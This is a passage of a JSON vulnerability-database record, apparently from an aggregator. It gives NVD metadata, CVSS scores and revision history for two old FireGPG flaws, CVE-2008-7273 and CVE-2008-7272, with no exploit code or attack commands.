"authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": 